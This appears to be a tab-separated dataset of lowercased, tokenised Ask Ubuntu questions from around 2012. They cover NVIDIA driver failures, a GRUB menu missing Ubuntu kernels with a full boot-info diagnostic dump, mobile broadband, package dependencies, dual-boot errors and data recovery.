221276	ubuntu 12.10 - nvidia driver problems	i recently purchased a new dell xps 14 , i was dual booting windows 8 with ubuntu 12.10 . initially , i had problems with getting the nvidia drivers to work correctly . when i reboot after the driver installation the ubuntu dash does n't appear , just the wallpaper . i 'm aware that this is a current issue and i have read other peoples solutions and still ca n't successfully get the proprietary drivers to work . i 've tried installing linux-source and linux-headers and reinstalling the drivers several times . no solution that i could find seemed to have worked . here is a list of the hardware i 'm running . intel core i7 3517u cpu 4 gb ddr3 ram nvidia geforce 630m 1gb dedicated graphics 500gb hdd with 32gb msata i am really not sure why this does n't work , any help would be greatly appreciated . thank you .
221285	how to autologin , then lock	i want to be able to have my computer log me in automatically , then immediatly lock my screen . i have ubuntu 12.10 and my home folder is encrypted . please help ?
221288	three 's mobile broadband	i 've recently downloaded ubuntu 12.10 and it seems great . i just ca n't get my three ireland mifi dongle to work at all . when i plug it in , it only recognizes it as a storage devise . any ideas on how to establish a permanent connection to this mifi dongle ? i 'm in ireland and running a dell inspiron 1520 with 3gb of ram and using the huawei e586 mifi device . i really want to continue using this os , but is everything this complicated to get up and running on it ?
221291	remove ugly fat bazel from gnome-terminal with multiple-tabs	when i start gnome-terminal it looks quite pleasant but when i open another tab it 's borders turns ugly : how can i preserve thin bezel while using multiple tabs ?
221292	unable to install openjdk6 due to unmet dependencies	i tried to install openjdk6 on 12.04 lts , with the command : sudo apt-get install openjdk-6-jre but got the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : openjdk-6-jre : depends : openjdk-6-jre-headless ( > = 6b24~pre1-1ubuntu3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . please help . thanks !
221293	why is chkconfig no longer available in ubuntu ?	i can not use chkconfig tools in ubuntu 12.10 it 's a very useful tools to configure the service to autostart or not . why is it no longer available ?
221294	launcher still missing after installing nvidia driver	i 've asked this question before but i 'm still stuck . i installed ubuntu 12.04 on a new computer with 2gb nvidia graphics card . i installed the 'current driver ' but on restart i get a blank desktop . the launcher is missing . i can tty though . but i do n't know what to do from there . alt + f2 does n't bring up anything .
221295	ubuntu missing from the grub menu	recently i 've had some audio issues with ubuntu ( using precise ) , and in the process of trying to resolve that i ran a dist-upgrade . everything went just fine , and the sound seemed good , until i rebooted my machine for the first time since the dist-upgrade . all i see now in the grub menu at startup is memtest86+ , another memtest variant , and windows 7 . it 's not showing any of the linux kernels that ubuntu is running on . i am attaching my bootinfoscript : boot info script 0.61.full + boot-repair extra info [ boot-info november 20th 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos6 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : vfat boot sector type : dell utility : fat16 boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : sda4 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : grub2 ( v1.99-2.00 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda6 and looks at sector 220046240 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos6 ) /boot/grub on this drive . operating system : ubuntu 12.04.1 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 273,104 273,042 de dell utility /dev/sda2 * 274,432 19,406,847 19,132,416 7 ntfs / exfat / hpfs /dev/sda3 19,406,848 218,274,364 198,867,517 7 ntfs / exfat / hpfs /dev/sda4 218,275,838 625,139,711 406,863,874 f w95 extended ( lba ) /dev/sda5 328,630,272 625,139,711 296,509,440 7 ntfs / exfat / hpfs /dev/sda6 218,275,840 324,030,463 105,754,624 83 linux /dev/sda7 324,032,512 328,626,175 4,593,664 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 07da-0512 vfat dellutility /dev/sda2 8834146034145392 ntfs recovery /dev/sda3 48e2189de21890f4 ntfs os /dev/sda5 bc2a44c02a447982 ntfs varshneya /dev/sda6 34731459-4b0f-46ac-a9bf-cb360a2c947c ext4 /dev/sda7 dcb9ce9b-799a-4c65-b008-887b01775670 swap /dev/sr0 iso9660 ubuntu 12.04.1 lts i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda6 /mnt ext4 ( rw ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda6/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 34731459-4b0f-46ac-a9bf-cb360a2c947c if loadfont /boot/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 34731459-4b0f-46ac-a9bf-cb360a2c947c set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 34731459-4b0f-46ac-a9bf-cb360a2c947c linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 34731459-4b0f-46ac-a9bf-cb360a2c947c linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 8834146034145392 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda6/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=34731459-4b0f-46ac-a9bf-cb360a2c947c / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda7 during installation uuid=dcb9ce9b-799a-4c65-b008-887b01775670 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda6 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 104.851909637 = 112.583880704 boot/grub/core.img 1 121.191410065 = 130.128285696 boot/grub/grub.cfg 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda4 00000000 eb 0f 2a 5d f4 b7 75 f2 e9 56 12 b8 50 b4 79 ec |..* ] ..u..v..p.y.| 00000010 89 91 ca c3 16 40 31 d0 ae c4 53 3d c7 dd d7 98 | ... .. @ 1 ... s= ... .| 00000020 bd a4 f2 a4 e8 ab fc ea 36 30 1b 34 cf 8a 28 30 | ... ... ..60.4.. ( 0| 00000030 43 95 6c 31 3e 76 93 58 84 37 99 c3 ae 3a 88 a3 |c.l1 > v.x.7 ... : ..| 00000040 c2 a6 36 2a f8 e0 e1 03 91 8d a1 50 cd ad b0 b5 |..6* ... ... .p ... .| 00000050 ad 69 3a 49 63 1f 4a 33 97 6e 0c 71 bf 7d bd 35 |.i : ic.j3.n.q . } .5| 00000060 86 c5 17 93 b4 9f e5 af e0 c4 6f f4 6f f9 4b dd | ... ... ... .o.o.k.| 00000070 14 39 e2 9e b9 36 ca b1 56 5b d9 b1 66 2c 05 b2 |.9 ... 6..v [ ..f , ..| 00000080 5d 5b 99 c0 db e6 81 27 ab c2 e1 55 00 ac 0b 2c | ] [ ... .. ' ... u ... , | 00000090 24 d3 8e 54 b0 3d ab 58 e4 23 fc 3a 79 93 fb 5e | $ ..t.=.x. # . : y..^| 000000a0 94 5a 3a c2 16 4e 56 cb 1b 7f 7e b3 4c 38 ca 5b |.z : ..nv ... ~.l8 . [ | 000000b0 ca ab c1 2c 2a 64 e7 77 fe 2a ba ee 08 33 b5 9b | ... , *d.w.* ... 3..| 000000c0 d0 c2 b4 a8 fc 73 4f 01 fd 03 61 75 eb 6d 1a 74 | ... ..so ... au.m.t| 000000d0 5f 79 31 7f ed e6 f5 99 21 36 16 ed 25 d9 6d 2b |_y1 ... .. ! 6.. % .m+| 000000e0 5f f4 42 b8 9d 01 89 10 fe df a4 98 e7 ab ab ea |_.b ... ... ... ... .| 000000f0 1d 1c 44 e1 49 d9 19 c9 ab f5 41 eb 4a 32 c2 39 |..d.i ... ..a.j2.9| 00000100 87 57 f6 f6 f3 b5 4d 17 72 f2 b1 16 19 aa ec 24 |.w ... .m.r ... ... $ | 00000110 39 bd e3 b1 68 b3 b0 7f fa 2a 3a 2e 99 ed db 8a |9 ... h ... .* : ... ..| 00000120 f8 61 b4 ef 9d 7d 85 95 ed ad eb 9e 71 f4 27 d3 |.a ... } ... ... q . '.| 00000130 f3 04 8b 8a 69 98 02 72 df e1 f9 83 27 5b 01 4c | ... .i..r ... . ' [ .l| 00000140 d4 9a b9 3b db ca 1e 40 35 db 6f c1 52 c0 7f 27 | ... ; ... @ 5.o.r..'| 00000150 8a 1d bc 34 89 24 b6 e3 fd ec a1 2a e5 9e d1 8f | ... 4. $ ... ..* ... .| 00000160 77 e0 d5 52 c0 4c c4 38 38 3c 28 19 bf 20 f0 03 |w..r.l.88 < ( .. ..| 00000170 38 a4 b1 b5 ed 6a b8 f7 a9 7b 65 b1 7b 64 4a 33 |8 ... .j ... { e. { dj3| 00000180 66 1a 60 29 38 1d 5b 52 40 31 de a5 0c 0f cc 6f |f.` ) 8 . [ r @ 1 ... ..o| 00000190 dd 31 6d 3d f0 2a 32 85 67 66 ca 4f 02 aa 0d 30 |.1m= . *2.gf.o ... 0| 000001a0 66 c9 b2 33 c2 4b 8a fa 3c 7b 52 02 00 88 8e cf |f..3.k.. < { r ... ..| 000001b0 67 1e d4 20 49 1d 1a b8 71 ad c2 d4 37 9d 00 fe |g.. i ... q ... 7 ... | 000001c0 ff ff 07 fe ff ff 02 e0 93 06 00 60 ac 11 00 fe | ... ... ... ..` ... .| 000001d0 ff ff 05 fe ff ff 01 00 00 00 01 b0 4d 06 00 00 | ... ... ... ... m ... | 000001e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 additional information : =================== log of boot-repair 2012-11-24__09h45 =================== boot-repair version : 3.195~ppa2~precise boot-sav version : 3.195~ppa2~precise glade2script version : 3.2.2~ppa45~precise boot-sav-extra version : 3.195~ppa2~precise boot-repair is executed in live-session ( ubuntu 12.04.1 lts , precise , ubuntu , i686 ) cpu op-mode ( s ) : 32-bit , 64-bit file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- =================== os-prober : /dev/sda2 : windows 7 ( loader ) : windows : chain /dev/sda6 : ubuntu 12.04.1 lts ( 12.04 ) : ubuntu : linux =================== blkid : /dev/sda1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 07da-0512 '' type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' 8834146034145392 '' type= '' ntfs '' /dev/sda3 : label= '' os '' uuid= '' 48e2189de21890f4 '' type= '' ntfs '' /dev/sda5 : label= '' varshneya '' uuid= '' bc2a44c02a447982 '' type= '' ntfs '' /dev/loop0 : type= '' squashfs '' /dev/sda6 : uuid= '' 34731459-4b0f-46ac-a9bf-cb360a2c947c '' type= '' ext4 '' /dev/sda7 : uuid= '' dcb9ce9b-799a-4c65-b008-887b01775670 '' type= '' swap '' /dev/sr0 : label= '' ubuntu 12.04.1 lts i386 '' type= '' iso9660 '' 1 disks with os , 2 os : 1 linux , 0 macos , 1 windows , 0 unknown type os . windows not detected by os-prober on sda3 . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== /mnt/etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== /mnt/etc/grub.d/ : drwxr-xr-x 2 root root 4096 nov 22 16:15 grub.d total 56 -rwxr-xr-x 1 root root 6743 sep 12 20:19 00_header -rwxr-xr-x 1 root root 5522 sep 12 20:05 05_debian_theme -rwxr-xr-x 1 root root 7407 sep 12 20:19 10_linux -rwxr-xr-x 1 root root 6335 sep 12 20:19 20_linux_xen -rwxr-xr-x 1 root root 1588 sep 24 2010 20_memtest86+ -rwxr-xr-x 1 root root 7603 sep 12 20:19 30_os-prober -rwxr-xr-x 1 root root 214 sep 12 20:19 40_custom -rwxr-xr-x 1 root root 95 sep 12 20:19 41_custom -rw-r -- r -- 1 root root 483 sep 12 20:19 readme =================== no kernel in /mnt/boot : grub memtest86+.bin memtest86+_multiboot.bin =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : sda1 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda1 . sda2 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , not-far , /mnt/boot-sav/sda2 . sda3 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , haswinload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda3 . sda5 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda5 . sda6 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 64 , no-kernel , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , /mnt . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 63 sectors * 512 bytes =================== parted -l : model : ata st9320423as ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 140mb 140mb primary fat16 diag 2 141mb 9936mb 9796mb primary ntfs boot 3 9936mb 112gb 102gb primary ntfs 4 112gb 320gb 208gb extended lba 6 112gb 166gb 54.1gb logical ext4 7 166gb 168gb 2352mb logical linux-swap ( v1 ) 5 168gb 320gb 152gb logical ntfs model : hl-dt-st dvd+-rw ga31n ( scsi ) disk /dev/sr0 : 4700mb sector size ( logical/physical ) : 2048b/2048b partition table : msdos number start end size type file system flags 1 131kb 2916mb 2916mb primary boot , hidden =================== parted -lm : byt ; /dev/sda:320gb : scsi:512:512 : msdos : ata st9320423as ; 1:32.3kb:140mb:140mb : fat16 : :diag ; 2:141mb:9936mb:9796mb : ntfs : :boot ; 3:9936mb:112gb:102gb : ntfs : : ; 4:112gb:320gb:208gb : : : lba ; 6:112gb:166gb:54.1gb : ext4 : : ; 7:166gb:168gb:2352mb : linux-swap ( v1 ) : : ; 5:168gb:320gb:152gb : ntfs : : ; byt ; /dev/sr0:4700mb : scsi:2048:2048 : msdos : hl-dt-st dvd+-rw ga31n ; 1:131kb:2916mb:2916mb : : : boot , hidden ; =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) /dev/sda6 on /mnt type ext4 ( rw ) /dev on /mnt/dev type none ( rw , bind ) /proc on /mnt/proc type none ( rw , bind ) /sys on /mnt/sys type none ( rw , bind ) /usr on /mnt/usr type none ( rw , bind ) /dev/sda1 on /mnt/boot-sav/sda1 type vfat ( rw ) /dev/sda2 on /mnt/boot-sav/sda2 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda3 on /mnt/boot-sav/sda3 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda5 on /mnt/boot-sav/sda5 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 sda6 sda7 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : autofs block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fd full fuse fw0 hidraw0 hpet input kmsg log mapper mcelog mei mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda3 sda4 sda5 sda6 sda7 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom usbmon0 usbmon1 usbmon2 v4l vga_arbiter video0 zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.9g 113m 1.8g 6 % / udev devtmpfs 1.9g 12k 1.9g 1 % /dev tmpfs tmpfs 777m 872k 776m 1 % /run /dev/sr0 iso9660 696m 696m 0 100 % /cdrom /dev/loop0 squashfs 667m 667m 0 100 % /rofs tmpfs tmpfs 1.9g 20k 1.9g 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.9g 176k 1.9g 1 % /run/shm /dev/sda6 ext4 51g 27g 22g 56 % /mnt /dev/sda1 vfat 134m 9.1m 125m 7 % /mnt/boot-sav/sda1 /dev/sda2 fuseblk 9.2g 5.6g 3.6g 61 % /mnt/boot-sav/sda2 /dev/sda3 fuseblk 95g 80g 16g 84 % /mnt/boot-sav/sda3 /dev/sda5 fuseblk 142g 130g 12g 92 % /mnt/boot-sav/sda5 =================== fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb8000000 device boot start end blocks id system /dev/sda1 63 273104 136521 de dell utility /dev/sda2 * 274432 19406847 9566208 7 hpfs/ntfs/exfat /dev/sda3 19406848 218274364 99433758+ 7 hpfs/ntfs/exfat /dev/sda4 218275838 625139711 203431937 f w95 ext 'd ( lba ) /dev/sda5 328630272 625139711 148254720 7 hpfs/ntfs/exfat /dev/sda6 218275840 324030463 52877312 83 linux /dev/sda7 324032512 328626175 2296832 82 linux swap / solaris partition table entries are not in disk order =================== repair blockers 64bits detected . please use this software in a 64bits session . ( please use ubuntu-secure-remix-64bits ( www.sourceforge.net/p/ubuntu-secured ) which contains a 64bits-compatible version of this software . ) this will enable this feature . =================== final advice in case of recommended repair the boot files of [ ubuntu 12.04.1 lts ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) =================== default settings recommended-repair this setting would reinstall the grub2 of sda6 into the mbr of sda , using the following options : kernel-purge additional repair would be performed : unhide-bootmenu-10s fix-windows-boot =================== settings chosen by the user boot-info this setting will not act on the mbr . no change has been performed on your computer . see you soon ! pastebinit packages needed dpkg-preconfigure : unable to re-open stdin : no such file or directory pastebin.com ko ( ) , using paste.ubuntu please report this message to yannubuntu @ gmail.com any help would be great , i 'm really missing ubuntu ( hate being stuck in the windows world ) . edit : just checked my /boot/ folder through the live cd , and the only two .bin files there are the memtest ones . is this relevant ? where would the linux kernel images usually be installed to ?
221296	asus s56cm and ubuntu	anyone having experience with the asus s56cm ultrabook ? does ubuntu work on it ?
221297	how to recover data from a drive that was erased during the ubuntu installation ?	yesterday i had two ntfs partitions on my drive . one on which windows 7 was installed ( c drive ) and the other contained my data ( d drive ) . during ubuntu installation i choose to install ubuntu and erase my existing os . when ubuntu installed , i was shocked to see no partition . all my data was gone . i must have done something wrong in selecting my option during installation . is there any way i can recover my d drive ?
221298	compiz settings manager kills the gui	i 've re-installed ubuntu 12.10 at least 4 times now in the past 12 hours trying to get the ccsm to work , but to no avail . i 'm scared to install ccsm now as it gets rid of any form of gui in the system , making it virtually useless for me . so how do i get the cool effects ? i 'm running ubuntu 3d desktop .
221307	upgrade 11.04 to 12.04	i 'm using ubuntu 11.04 . my computer is no longer supported and my computer is now trying to get me to upgrade to 12.10 . but i want to upgrade to 12.04 . can i upgrade to 12.04 using the update manager or do i have to use a bootable disk ? and will it be fine ?
221308	how to write 2 iso file on one dvd	how to write ubuntu ( iso ) and super grub disk ( iso ) on one dvd ? i want to boot them . thanks
221311	grub errors during uefi dual boot for windows 8 ( ca n't find command 'drivemap ' )	i have got a newly bought asus n56v with windows 8 preinstalled . i needed to install ubuntu so i partitioned the disk and after having disabled the secure boot option from windows 8 i successfully installed ubuntu 12.10 from a live usb . the problem is that if i try to access both to windows 8 ( loader ) and windows recovery system ( loader ) from the grub menu , these two errors show : ca n't find command 'drivemap ' and invalid efi file path and it goes back to the grub menu . in conclusion i do not have access to my windows 8 partition but can only use ubuntu . how can i solve the problem ? i am pretty new to the matter . thank you !
221312	sandisk usb thumb drive wo n't mount because file system is not installed	my not working flash sandisk 8gb im use disk untility for formating not working usb busy and unmount or mount not working ? help any and terminal im use
221314	running the ubuntu kernel and os on custom processor	this is hardly a theoretical question as many have done this , albeit there 's very little information on the underlying processes . i 'm developing a custom mips-based processor on which i would like to run ubuntu . i 'm quite baffled as to what to do next after you 've designed the instruction set and the computer architecture itself . i need to be able to run a kernel and os but how does it all tie in ? at the moment i 'm researching into designing a compiler for the linux kernel to generate the appropriate assembly language . is that a good way to go ? what do i need to do after that ?
221320	`` authentication failed '' when downloading the release upgrade tool	when i try to update my ubuntu , a window opens which shows downloading the release upgrade tool and then gives an error `` authentication failed '' . please help .
221321	vlc lagging while running hd videos	my vlc player keeps lagging while i play hd videos . to be more especific , it has been lagging in mp4 files with 720p and 1080p . it keeps stopping like 10 seconds to 10 seconds . the stopping time is less than 1 second . system : ubuntu 12.10 , cpu intel i3 , graphics are ati mobility radeon hd5145 , 512mb dedicated . it 's a laptop , asus k52jb i hav open source ati driver installed . can anyone help me ?
221325	how can i set up a triple boot with encrypted system partitions and shared /home ?	i wanted to run 12.04 ( 32 bit ) , 12.10 ( 64 bit ) and windows 7 with full system encryption on either one of the ubuntu installations and preferably a shared /home partition ( at least the data with encryption ) . i have no idea how to go about it or for that matter if it 's even possible . so now i get to my question : can you please point me in the right direction or get me started ?
221326	how can i backup gnome-shell extensions	i 'm creating my post-instalation script for my ubuntu 12.04 lst x64 and i would like to know how can i backup current installed extensions . can i create own extension package to easy install ? is here any way how can i install all my extensions with ( only one ) command over the terminal ? thanks all for answers . i apologize for my bad english . i hope you will understand me a little .
